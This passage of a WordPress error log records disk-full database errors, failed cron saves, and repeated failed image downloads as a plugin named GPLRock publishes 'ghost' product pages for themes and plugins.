gc.ghost_lokal_product_image FROM wpwf_gplrock_products p JOIN wpwf_gplrock_ghost_content gc ON p.product_id = gc.product_id WHERE p.category = 'theme' AND p.product_id != 'preston-fruit-company-organic-farming-wordpress-theme' AND p.status = 'active' AND gc.status = 'active' ORDER BY p.downloads_count DESC LIMIT 6 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), do_action('template_redirect'), WP_Hook->do_action, WP_Hook->apply_filters, GPLRock\Public_Frontend->template_redirect, GPLRock\Public_Frontend->display_ghost_content, GPLRock\Public_Frontend->display_ghost_page, include('/plugins/gplrock-auto-publisher/templates/ghost-single.php') [04-Apr-2026 22:29:36 UTC] GPLRock: Image download failed for product emaily-woocommerce-responsive-email-template-subscriptions-bookings-memberships-compatible (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:37 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fcd.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.product_id, p.title, gc.url_slug, p.downloads_count FROM wpwf_gplrock_products p JOIN wpwf_gplrock_ghost_content gc ON p.product_id = gc.product_id WHERE p.status = 'active' AND gc.status = 'active' ORDER BY p.product_id ASC LIMIT 10 OFFSET 424 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), do_action('template_redirect'), WP_Hook->do_action, WP_Hook->apply_filters, GPLRock\Public_Frontend->template_redirect, GPLRock\Public_Frontend->display_ghost_content, GPLRock\Public_Frontend->display_ghost_page, include('/plugins/gplrock-auto-publisher/templates/ghost-single.php'), get_footer, locate_template, load_template, require_once('/themes/hello-elementor/footer.php'), wp_footer, do_action('wp_footer'), WP_Hook->do_action, WP_Hook->apply_filters, GPLRock\Public_Frontend->add_ghost_homepage_seo_backlink [04-Apr-2026 22:29:37 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd17b2-2fce.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) INNER JOIN wpwf_postmeta AS mt1 ON ( wpwf_posts.ID = mt1.post_id ) WHERE 1=1 AND ( wpwf_postmeta.meta_key = '_elementor_priority' AND ( ( mt1.meta_key = '_elementor_location' AND mt1.meta_value = 'elementor_body_end' ) ) ) AND wpwf_posts.post_type = 'elementor_snippet' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_postmeta.meta_value+0 ASC made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), do_action('template_redirect'), WP_Hook->do_action, WP_Hook->apply_filters, GPLRock\Public_Frontend->template_redirect, GPLRock\Public_Frontend->display_ghost_content, GPLRock\Public_Frontend->display_ghost_page, include('/plugins/gplrock-auto-publisher/templates/ghost-single.php'), get_footer, locate_template, load_template, require_once('/themes/hello-elementor/footer.php'), wp_footer, do_action('wp_footer'), WP_Hook->do_action, WP_Hook->apply_filters, ElementorPro\Modules\CustomCode\Module->ElementorPro\Modules\CustomCode\{closure}, ElementorPro\Modules\CustomCode\Module->print_snippets, ElementorPro\Modules\CustomCode\Module->get_snippets_by_location, get_posts, WP_Query->query, WP_Query->get_posts [04-Apr-2026 22:29:38 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd1805-32cb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [04-Apr-2026 22:29:38 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd1805-32cc.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [04-Apr-2026 22:29:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emaily--woocommerce-responsive-email-template--subscriptions--bookings--membersh-23739.webp for product emaily-woocommerce-responsive-email-template-subscriptions-bookings-memberships-compatible after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:38 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd1805-32cf.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_reschedule_event, wp_schedule_event, _set_cron_array, update_option [04-Apr-2026 22:29:38 UTC] Cron reschedule event error for hook: action_scheduler_run_queue, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"every_minute","args":["WP Cron"],"interval":60} [04-Apr-2026 22:29:38 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd1805-32d0.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_unschedule_event, _set_cron_array, update_option [04-Apr-2026 22:29:38 UTC] Cron unschedule event error for hook: action_scheduler_run_queue, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"every_minute","args":["WP Cron"],"interval":60} [04-Apr-2026 22:29:38 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd1805-32d2.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_actionscheduler_claims` made by do_action_ref_array('action_scheduler_run_queue'), WP_Hook->do_action, WP_Hook->apply_filters, ActionScheduler_QueueRunner->run, ActionScheduler_QueueRunner->do_batch, ActionScheduler_DBStore->stake_claim, ActionScheduler_DBStore->generate_claim_id [04-Apr-2026 22:29:38 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-bd1805-32d5.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by delete_transient, delete_option [04-Apr-2026 22:29:38 UTC] GPLRock: Image download failed for product emaily-woocommerce-responsive-email-template-subscriptions-bookings-memberships-compatible (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:40 UTC] GPLRock: Image download failed for product emaily-woocommerce-responsive-email-template-subscriptions-bookings-memberships-compatible (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emaily--woocommerce-responsive-email-template--subscriptions--bookings--membersh-23739.webp for product emaily-woocommerce-responsive-email-template-subscriptions-bookings-memberships-compatible after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:42 UTC] GPLRock WARNING: Image download failed for product emaily-woocommerce-responsive-email-template-subscriptions-bookings-memberships-compatible. URL: https://meldwp.com/wp-content/uploads/emaily--woocommerce-responsive-email-template--subscriptions--bookings--membersh-23739.webp [04-Apr-2026 22:29:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: emaily-woocommerce-responsive-email-template-subscriptions-bookings-memberships-compatible [04-Apr-2026 22:29:43 UTC] GPLRock: Image download failed for product wooprofil-woocommerce-products-search-and-filter-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:45 UTC] GPLRock: Image download failed for product wooprofil-woocommerce-products-search-and-filter-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wooprofil-woocommerce-products-search-and-filter-wordpress-plugin-13383.webp for product wooprofil-woocommerce-products-search-and-filter-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:47 UTC] GPLRock: Image download failed for product wooprofil-woocommerce-products-search-and-filter-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:49 UTC] GPLRock: Image download failed for product wooprofil-woocommerce-products-search-and-filter-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wooprofil-woocommerce-products-search-and-filter-wordpress-plugin-13383.webp for product wooprofil-woocommerce-products-search-and-filter-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:51 UTC] GPLRock WARNING: Image download failed for product wooprofil-woocommerce-products-search-and-filter-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/wooprofil-woocommerce-products-search-and-filter-wordpress-plugin-13383.webp [04-Apr-2026 22:29:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wooprofil-woocommerce-products-search-and-filter-wordpress-plugin [04-Apr-2026 22:29:51 UTC] GPLRock: Image download failed for product sumo-woocommerce-waitlist (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:54 UTC] GPLRock: Image download failed for product sumo-woocommerce-waitlist (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-woocommerce-waitlist-14394.webp for product sumo-woocommerce-waitlist after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:29:56 UTC] GPLRock: Image download failed for product sumo-woocommerce-waitlist (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:29:58 UTC] GPLRock: Image download failed for product sumo-woocommerce-waitlist (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-woocommerce-waitlist-14394.webp for product sumo-woocommerce-waitlist after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:30:00 UTC] GPLRock WARNING: Image download failed for product sumo-woocommerce-waitlist. URL: https://meldwp.com/wp-content/uploads/sumo-woocommerce-waitlist-14394.webp [04-Apr-2026 22:30:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sumo-woocommerce-waitlist [04-Apr-2026 22:30:00 UTC] GPLRock: Image download failed for product woocommerce-plugin-customization (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:02 UTC] GPLRock: Image download failed for product woocommerce-plugin-customization (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-plugin-customization-24121.webp for product woocommerce-plugin-customization after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:30:05 UTC] GPLRock: Image download failed for product woocommerce-plugin-customization (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:07 UTC] GPLRock: Image download failed for product woocommerce-plugin-customization (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-plugin-customization-24121.webp for product woocommerce-plugin-customization after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:30:09 UTC] GPLRock WARNING: Image download failed for product woocommerce-plugin-customization. URL: https://meldwp.com/wp-content/uploads/woocommerce-plugin-customization-24121.webp [04-Apr-2026 22:30:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-plugin-customization [04-Apr-2026 22:30:09 UTC] GPLRock: Image download failed for product crypto-price-alerts-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:11 UTC] GPLRock: Image download failed for product crypto-price-alerts-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crypto-price-alerts--wordpress-plugin-29821.webp for product crypto-price-alerts-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:30:13 UTC] GPLRock: Image download failed for product crypto-price-alerts-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:15 UTC] GPLRock: Image download failed for product crypto-price-alerts-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crypto-price-alerts--wordpress-plugin-29821.webp for product crypto-price-alerts-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:30:17 UTC] GPLRock WARNING: Image download failed for product crypto-price-alerts-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/crypto-price-alerts--wordpress-plugin-29821.webp [04-Apr-2026 22:30:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crypto-price-alerts-wordpress-plugin [04-Apr-2026 22:30:49 UTC] GPLRock: Image download failed for product car-dealer-automotive-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:51 UTC] GPLRock: Image download failed for product car-dealer-automotive-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/car-dealer---automotive-responsive-wordpress-theme-27454.webp for product car-dealer-automotive-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:30:53 UTC] GPLRock: Image download failed for product car-dealer-automotive-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:55 UTC] GPLRock: Image download failed for product car-dealer-automotive-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:30:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/car-dealer---automotive-responsive-wordpress-theme-27454.webp for product car-dealer-automotive-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:30:57 UTC] GPLRock WARNING: Image download failed for product car-dealer-automotive-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/car-dealer---automotive-responsive-wordpress-theme-27454.webp [04-Apr-2026 22:30:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: car-dealer-automotive-responsive-wordpress-theme [04-Apr-2026 22:30:58 UTC] GPLRock: Image download failed for product 8pulse-motorcycle-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:00 UTC] GPLRock: Image download failed for product 8pulse-motorcycle-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/8pulse---motorcycle-wordpress-theme-12523.webp for product 8pulse-motorcycle-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:02 UTC] GPLRock: Image download failed for product 8pulse-motorcycle-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:04 UTC] GPLRock: Image download failed for product 8pulse-motorcycle-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/8pulse---motorcycle-wordpress-theme-12523.webp for product 8pulse-motorcycle-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:06 UTC] GPLRock WARNING: Image download failed for product 8pulse-motorcycle-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/8pulse---motorcycle-wordpress-theme-12523.webp [04-Apr-2026 22:31:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 8pulse-motorcycle-wordpress-theme [04-Apr-2026 22:31:06 UTC] GPLRock: Image downloaded successfully for product artem-digital-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ef9ba20.webp [04-Apr-2026 22:31:07 UTC] GPLRock: Using pre-downloaded image for product artem-digital-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ef9ba20.webp [04-Apr-2026 22:31:07 UTC] GPLRock: Ghost product published with image - Product ID: artem-digital-agency-wordpress-theme [04-Apr-2026 22:31:07 UTC] GPLRock: Image download failed for product kayleen-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:09 UTC] GPLRock: Image download failed for product kayleen-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kayleen--blog--magazine-wordpress-theme-6064.webp for product kayleen-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:11 UTC] GPLRock: Image download failed for product kayleen-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:13 UTC] GPLRock: Image download failed for product kayleen-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kayleen--blog--magazine-wordpress-theme-6064.webp for product kayleen-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:15 UTC] GPLRock WARNING: Image download failed for product kayleen-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kayleen--blog--magazine-wordpress-theme-6064.webp [04-Apr-2026 22:31:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kayleen-blog-magazine-wordpress-theme [04-Apr-2026 22:31:15 UTC] GPLRock: Image download failed for product charry-non-profit-charity-wordpress-themes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:17 UTC] GPLRock: Image download failed for product charry-non-profit-charity-wordpress-themes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charry---non-profit-charity-wordpress-themes-4628.webp for product charry-non-profit-charity-wordpress-themes after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:20 UTC] GPLRock: Image download failed for product charry-non-profit-charity-wordpress-themes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:22 UTC] GPLRock: Image download failed for product charry-non-profit-charity-wordpress-themes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charry---non-profit-charity-wordpress-themes-4628.webp for product charry-non-profit-charity-wordpress-themes after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:24 UTC] GPLRock WARNING: Image download failed for product charry-non-profit-charity-wordpress-themes. URL: https://meldwp.com/wp-content/uploads/charry---non-profit-charity-wordpress-themes-4628.webp [04-Apr-2026 22:31:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: charry-non-profit-charity-wordpress-themes [04-Apr-2026 22:31:24 UTC] GPLRock: Image download failed for product valkuta-pet-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:26 UTC] GPLRock: Image download failed for product valkuta-pet-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valkuta---pet-wordpress-theme-6936.webp for product valkuta-pet-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:28 UTC] GPLRock: Image download failed for product valkuta-pet-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:30 UTC] GPLRock: Image download failed for product valkuta-pet-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valkuta---pet-wordpress-theme-6936.webp for product valkuta-pet-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:32 UTC] GPLRock WARNING: Image download failed for product valkuta-pet-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/valkuta---pet-wordpress-theme-6936.webp [04-Apr-2026 22:31:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: valkuta-pet-wordpress-theme [04-Apr-2026 22:31:33 UTC] GPLRock: Image download failed for product savelife-charity-donation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:35 UTC] GPLRock: Image download failed for product savelife-charity-donation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/savelife---charity--donation-wordpress-theme-10927.webp for product savelife-charity-donation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:37 UTC] GPLRock: Image download failed for product savelife-charity-donation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:39 UTC] GPLRock: Image download failed for product savelife-charity-donation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/savelife---charity--donation-wordpress-theme-10927.webp for product savelife-charity-donation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:41 UTC] GPLRock WARNING: Image download failed for product savelife-charity-donation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/savelife---charity--donation-wordpress-theme-10927.webp [04-Apr-2026 22:31:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: savelife-charity-donation-wordpress-theme [04-Apr-2026 22:31:41 UTC] GPLRock: Image download failed for product event2-workshop-expo-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:43 UTC] GPLRock: Image download failed for product event2-workshop-expo-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/event2-workshop--expo--agency-wordpress-theme-7500.webp for product event2-workshop-expo-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:46 UTC] GPLRock: Image download failed for product event2-workshop-expo-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:48 UTC] GPLRock: Image download failed for product event2-workshop-expo-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/event2-workshop--expo--agency-wordpress-theme-7500.webp for product event2-workshop-expo-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:50 UTC] GPLRock WARNING: Image download failed for product event2-workshop-expo-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/event2-workshop--expo--agency-wordpress-theme-7500.webp [04-Apr-2026 22:31:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: event2-workshop-expo-agency-wordpress-theme [04-Apr-2026 22:31:50 UTC] GPLRock: Image download failed for product marcell-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:52 UTC] GPLRock: Image download failed for product marcell-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marcell--personal-blog--magazine-wordpress-theme-19715.webp for product marcell-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:54 UTC] GPLRock: Image download failed for product marcell-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:56 UTC] GPLRock: Image download failed for product marcell-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:31:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marcell--personal-blog--magazine-wordpress-theme-19715.webp for product marcell-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:31:58 UTC] GPLRock WARNING: Image download failed for product marcell-personal-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/marcell--personal-blog--magazine-wordpress-theme-19715.webp [04-Apr-2026 22:31:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: marcell-personal-blog-magazine-wordpress-theme [04-Apr-2026 22:31:59 UTC] GPLRock: Image download failed for product multikart-react-next-js-multipurpose-ecommerce-react-hooks-context-api (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:01 UTC] GPLRock: Image download failed for product multikart-react-next-js-multipurpose-ecommerce-react-hooks-context-api (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multikart---react-next-js-multipurpose-ecommerce-react-hooks--context-api-23591.webp for product multikart-react-next-js-multipurpose-ecommerce-react-hooks-context-api after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:32:03 UTC] GPLRock: Image download failed for product multikart-react-next-js-multipurpose-ecommerce-react-hooks-context-api (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:05 UTC] GPLRock: Image download failed for product multikart-react-next-js-multipurpose-ecommerce-react-hooks-context-api (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multikart---react-next-js-multipurpose-ecommerce-react-hooks--context-api-23591.webp for product multikart-react-next-js-multipurpose-ecommerce-react-hooks-context-api after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:32:07 UTC] GPLRock WARNING: Image download failed for product multikart-react-next-js-multipurpose-ecommerce-react-hooks-context-api. URL: https://meldwp.com/wp-content/uploads/multikart---react-next-js-multipurpose-ecommerce-react-hooks--context-api-23591.webp [04-Apr-2026 22:32:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multikart-react-next-js-multipurpose-ecommerce-react-hooks-context-api [04-Apr-2026 22:32:45 UTC] GPLRock: Image download failed for product ripara-auto-repair-car-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:47 UTC] GPLRock: Image download failed for product ripara-auto-repair-car-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ripara---auto-repair--car-woocommerce-wordpress-theme-996.webp for product ripara-auto-repair-car-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:32:49 UTC] GPLRock: Image download failed for product ripara-auto-repair-car-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:51 UTC] GPLRock: Image download failed for product ripara-auto-repair-car-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ripara---auto-repair--car-woocommerce-wordpress-theme-996.webp for product ripara-auto-repair-car-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:32:53 UTC] GPLRock WARNING: Image download failed for product ripara-auto-repair-car-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ripara---auto-repair--car-woocommerce-wordpress-theme-996.webp [04-Apr-2026 22:32:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ripara-auto-repair-car-woocommerce-wordpress-theme [04-Apr-2026 22:32:53 UTC] GPLRock: Image download failed for product fundboxs-charity-donation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:55 UTC] GPLRock: Image download failed for product fundboxs-charity-donation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:32:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fundboxs---charity--donation-wordpress-theme-17534.webp for product fundboxs-charity-donation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:32:58 UTC] GPLRock: Image download failed for product fundboxs-charity-donation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:00 UTC] GPLRock: Image download failed for product fundboxs-charity-donation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fundboxs---charity--donation-wordpress-theme-17534.webp for product fundboxs-charity-donation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:02 UTC] GPLRock WARNING: Image download failed for product fundboxs-charity-donation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fundboxs---charity--donation-wordpress-theme-17534.webp [04-Apr-2026 